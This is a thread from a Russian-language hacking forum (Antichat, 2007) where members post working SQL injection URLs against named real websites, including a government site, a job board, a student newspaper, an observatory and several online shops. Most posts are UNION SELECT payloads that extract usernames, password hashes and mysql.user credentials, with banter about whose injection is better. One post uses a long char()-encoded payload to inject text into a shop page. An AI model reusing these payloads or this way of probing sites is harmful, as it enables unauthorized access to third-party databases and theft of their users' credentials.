ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1071  
Старый 16.03.2007, 17:34
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Ksander  
Монголия хекд!

www.president.mn

Код:
http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*

p.s.

Как удалось табл.подобрать ? Оо
я ужо постил), тут кажись некоторые ссылки раз по 5 повторяются, если не больше.

Код:
http://www.jobs.ge/index.php?ur=job&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,USER(),4,5,6,7,8/*
 
Ответить с цитированием

  #1072  
Старый 16.03.2007, 18:14
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #1073  
Старый 16.03.2007, 19:47
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.stroyrt.ru/index.php?page=news&newsid=-1+union+select+1,concat(login,char(58),passwd),3,4+from+users+limit+1,1/*
 
Ответить с цитированием

  #1074  
Старый 16.03.2007, 19:54
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Colkru  
Код:
http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Код:
http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,convert(соncat(user,сhаr(58),pаsswоrd),char),6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*
моё кунг фу сильнее твоего =)

http://www.dailycal.org/admin/ нет доступа =(

Последний раз редактировалось Ksander; 16.03.2007 в 19:59..
 
Ответить с цитированием

  #1075  
Старый 16.03.2007, 19:59
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.kvalitet.com.ua/shop/new.php?ID=-36%20UNION%20SELECT%201,2,3,4+from+news/*
Код:
http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
выборка с таблицы users возможна
и это еще не конец((

Код:
http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3
-вылетает
коммент (You have an error in your SQL syntax; check the manual .......) че за нах?

Последний раз редактировалось XTErner; 16.03.2007 в 20:45..
 
Ответить с цитированием

  #1076  
Старый 16.03.2007, 20:07
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

college.ru
Код:
http://www.college.ru/modules.php?name=Teacher&param=viewlink&cid=-1+union+select+1,2,3,4,5/*
не смог подобрать таблицу юзеров) версия 4, фильтация скобок в запросах...(

Код:
http://www.voinenet.ru/index.php?aid=-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/*
к mysql.user доступа нет.
зато версия 5

Последний раз редактировалось n1†R0x; 16.03.2007 в 20:20..
 
Ответить с цитированием

  #1077  
Старый 16.03.2007, 21:37
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

http://www.mks-ks.ru/shop/cat.php?id=-4+union+select+1,2,3,convert(version()+using+cp125 1)/*
 
Ответить с цитированием

  #1078  
Старый 16.03.2007, 21:39
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

все ценим мою скулю
знаков много, будут пробелы.
Код:
http://www.m16.ru/shop/index.php?page=model&id=-30+union+select+1,char(241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,233,32,237,238,243,242),3,char(40,236,238,228,229,235,252,32,92,34,243,240,243,240,243,92,34,41),5,6,char(237,232,232,239,224,246,224,32,241,234,238,235,252,234,238,32),8,9,char(205,238,226,224,255,32,236,238,228,229,235,252,32,241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,227,238,32,237,238,243,242,224,32,211,208,211,208,211,32,239,238,236,238,230,229,242,32,226,224,236,32,226,32,242,224,234,238,236,32,237,229,235,184,227,234,238,236,32,228,229,235,229,32,234,224,234,32,213,221,202,46,32,206,242,235,232,247,232,242,232,235,252,237,238,32,238,241,238,225,229,237,237,238,241,242,252,254,32,228,224,237,237,238,233,32,236,238,228,229,235,232,32,255,226,235,255,229,242,241,255,32,236,232,245,224,237,232,231,236,32,240,224,231,225,232,226,224,237,232,255,32,234,224,236,237,229,233,32,232,32,226,251,231,238,226,32,232,231,32,227,235,243,225,232,237,32,238,234,229,224,237,224,32,241,224,236,238,227,238,32,202,242,243,235,245,243),char(208,250,235,252,255,245),150,5,char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(245,231),char(51,50,32,234,225),0,char(207,238,228,228,229,240,230,234,224,32,240,224,231,240,229,248,229,237,232,255,32,49,120,49,32,112,105,99,115),50000,char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),char(237,229,242),char(236,238,228,229,236,32,241,238,32,241,234,238,240,238,241,242,252,254,32,57,57,57,32,71,98,105,116,47,115),char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),0,1400000,char(239,238,230,232,231,229,237,237,238,32,237,224,245),char(77,83,45,68,79,83),char(239,224,235,252,247,229,234,238,226,224,255),char(221,242,238,242,32,237,238,243,242,225,243,234,32,226,251,32,236,238,230,229,242,229,32,234,243,239,232,242,252,32,243,32,83,112,121,100,101,114,92,39,97,46,32,65,78,84,73,67,72,65,84,32,82,117,108,101,115,33,33,33)
 
Ответить с цитированием

  #1079  
Старый 16.03.2007, 22:24
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.keckobservatory.org


Колонку не подобрал =(
Код:
http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(version(),char),3,4,5,6,7,8+from+mysql.user/*
 
Ответить с цитированием

  #1080  
Старый 16.03.2007, 22:46
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ksander  
www.keckobservatory.org


Колонку не подобрал =(
Код:
http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(version(),char),3,4,5,6,7,8+from+mysql.user/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(concat(user,char(58),pass word),char),3,4,5,6,7,8+from+mysql.user+limit+0,1/*

Элементарно, правда пасса нет((

Последний раз редактировалось Colkru; 16.03.2007 в 22:48..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ